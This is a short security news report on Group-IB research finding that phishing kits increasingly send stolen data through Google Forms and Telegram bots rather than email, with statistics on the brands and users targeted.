While email remains the preferred attackers’ method for exfiltrating stolen information in phishing attacks, security researchers note an increase in alternative methods like Google Forms or private Telegram bots. These methods may be precursors to a new twist in the evolution of phishing kits.
Researchers at cybersecurity company Group-IB noticed that over the past year, more and more phishing kits include tools that allow collecting stolen user data using Google Forms and Telegram.
Currently, attackers use email in 94% of cases, while alternative methods constitute roughly 6% of phishing kits that Group-IB has analyzed, a share the security company to increase in the near future.
The favorite alternative exfiltration method of the phishing operators is storing the stolen data in a local file in the phishing resource.
The use of Telegram is not surprising, as this Russian messaging app is anonymous, free, and easy to use. It’s nothing new either: back in 2019, the notorious phishing kit 16Shop exfiltrated all the data stolen from the victims via this messaging service.
A scam-as-a-service operation used by at least 40 cybercriminal gangs also used Telegram bots to show fraudulent web pages to its victims.
Researchers have seen an increased use of Google Form as well. This method involves sending stolen data collected from a phishing site to Google Form via a POST request to an online form which link is embedded in the phishing kit.
Compared to email this is a safer method to exfiltrate the information since an email service can be blocked or hijacked and the logs lost, Group–IB told BleepingComputer.
Analyzing the victims in these campaigns, Group-IB identified more than 260 brands, most of them online services. Thirty percent of them were online tools for viewing documents, online shopping, streaming services, and more, 22.8% – email clients, and 20% – financial organizations. While the top individuals targeted were users of Google, Microsoft, PayPal, and Yahoo products, the researchers say.
A direct consequence of this is spreading “more complex social engineering used in large-scale attacks,” Yaroslav Kargalev, Deputy Director of Group-IB’s incident response team (CERT-GIB), said. This would require blocking the attacker’s entire infrastructure, not just the phishing websites.